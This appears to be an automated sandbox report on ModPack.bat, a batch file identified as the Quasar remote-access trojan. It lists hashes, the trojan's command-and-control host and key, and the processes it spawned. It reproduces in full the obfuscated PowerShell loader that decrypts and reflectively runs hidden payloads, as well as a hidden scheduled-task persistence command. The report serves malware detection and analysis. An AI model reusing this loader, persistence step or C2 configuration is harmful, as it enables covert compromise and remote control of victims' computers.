Analysis
max time kernel: 34s
max time network: 51s
platform: windows11-21h2_x64
resource: win11-20240412-en
resource tags: arch:x64, arch:x86, image:win11-20240412-en, locale:en-us, os:windows11-21h2-x64, system
submitted: 13-04-2024 20:25

Static task: static1
Behavioral task: behavioral1 (Sample: ModPack.bat; Resource: win10-20240404-en)
Behavioral task: behavioral2 (Sample: ModPack.bat; Resource: win10v2004-20240412-en)
General
Target: ModPack.bat
Size: 1.6MB
MD5: 3ab2a7793b323765353fa8e597cec156
SHA1: c892cc5095ac6f37d0e94bbc09e11abe3d62027a
SHA256: a2c3928e33f47ec7dd1caf488af3aecd0e829031740dda298513ef24795bad54
SHA512: 90c1a411b9b9cbcef33cc80c0f746ee67501e21998c8a85c7af868da450a8f7ab2a405562b3e9c9e26f77a4a75b9532d30816f20865dfdd29c555882ea72abcc
SSDEEP: 24576:zVHGMbIfHrrVuAAJ1wVKTV9QzlkWMGyR7mgVvIhiMej1Ma:pHEvrroBVykjea
Malware Config
Extracted
Family: quasar
Version: 1.4.1
Botnet: Office04
C2: notes-creation.gl.at.ply.gg:27030
Mutex: 6735a92b-88d2-4fbe-8e59-605a85072109
Attributes:
encryption_key: 8681483EF512C654BECF205A0D74FFCA4B129A98
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Trapix Client Startup
subdirectory: SubDir
Signatures

Quasar payload 1 IoCs
Processes:
resource: behavioral3/memory/2996-53-0x000002346F4F0000-0x000002346F814000-memory.dmp; yara_rule: family_quasar

Blocklisted process makes network request 2 IoCs
Processes:
flow 2, pid 2996, powershell.exe
flow 4, pid 2996, powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

Modifies registry class 1 IoCs
Processes:
Key created: \REGISTRY\USER\S-1-5-21-2516240262-2296879883-3965305654-1000_Classes\Local Settings (powershell.exe)

Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
pid 4140 powershell.exe (2 entries)
pid 2664 powershell.exe (2 entries)
pid 2996 powershell.exe (2 entries)

Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
pid 4140 powershell.exe: Token: SeDebugPrivilege
pid 2664 powershell.exe: Token: SeDebugPrivilege, followed by the sequence below, which is recorded three times (the third run stops at token 35):
SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36

Suspicious use of WriteProcessMemory 10 IoCs
Processes:
PID 1312 cmd.exe wrote to memory of 4140 powershell.exe (2 entries)
PID 4140 powershell.exe wrote to memory of 2664 powershell.exe (2 entries)
PID 4140 powershell.exe wrote to memory of 4536 WScript.exe (2 entries)
PID 4536 WScript.exe wrote to memory of 3632 cmd.exe (2 entries)
PID 3632 cmd.exe wrote to memory of 2996 powershell.exe (2 entries)
Processes

C:\Windows\system32\cmd.exe (PID 1312)
Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModPack.bat"
Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4140)
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  Signatures: Modifies registry class; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2664)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_130_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_130.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WScript.exe (PID 4536)
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_130.vbs"
    Signatures: Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe (PID 3632)
      Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_130.bat" "
      Signatures: Suspicious use of WriteProcessMemory

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2996)
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WHU9LIZZZnpXvmHPYv+jvQzDV7636Q84bvp2wMYdDEY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WBD6QKFaFapBAwUbctfeFg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $XGRxz=New-Object System.IO.MemoryStream(,$param_var); $eoWcZ=New-Object System.IO.MemoryStream; $ZKHsZ=New-Object System.IO.Compression.GZipStream($XGRxz, [IO.Compression.CompressionMode]::Decompress); $ZKHsZ.CopyTo($eoWcZ); $ZKHsZ.Dispose(); $XGRxz.Dispose(); $eoWcZ.Dispose(); $eoWcZ.ToArray();}function execute_function($param_var,$param2_var){ $aqZjX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tUwTg=$aqZjX.EntryPoint; $tUwTg.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_130.bat';$qeekY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_130.bat').Split([Environment]::NewLine);foreach ($hvTHj in $qeekY) { if ($hvTHj.StartsWith(':: ')) { $YbvrY=$hvTHj.Substring(3); break; }}$payloads_var=[string[]]$YbvrY.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        Signatures: Blocklisted process makes network request; Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads